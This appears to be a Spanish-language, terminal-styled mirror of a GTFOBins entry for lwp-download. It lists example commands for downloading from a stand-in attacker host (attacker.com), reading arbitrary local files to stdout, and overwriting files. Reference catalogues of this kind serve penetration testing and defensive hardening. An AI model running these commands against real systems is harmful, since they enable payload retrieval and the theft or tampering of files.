root@defcon-rd // ./arsenal/gtfobins/lwp-download
lwp-download
./lwp-download --examples
Funciones y ejemplos de uso
download
lwp-download http://attacker.com/path/to/input-file /path/to/output-file
file-read
lwp-download file:///path/to/input-file /dev/stdout
file-write
echo DATA >/path/to/temp-file
lwp-download file:///path/to/temp-file /path/to/output-file
lwp-download file:///path/to/input-file /path/to/output-file
./related --binary=lwp-download
Binarios relacionados
Comparten al menos una función con lwp-download.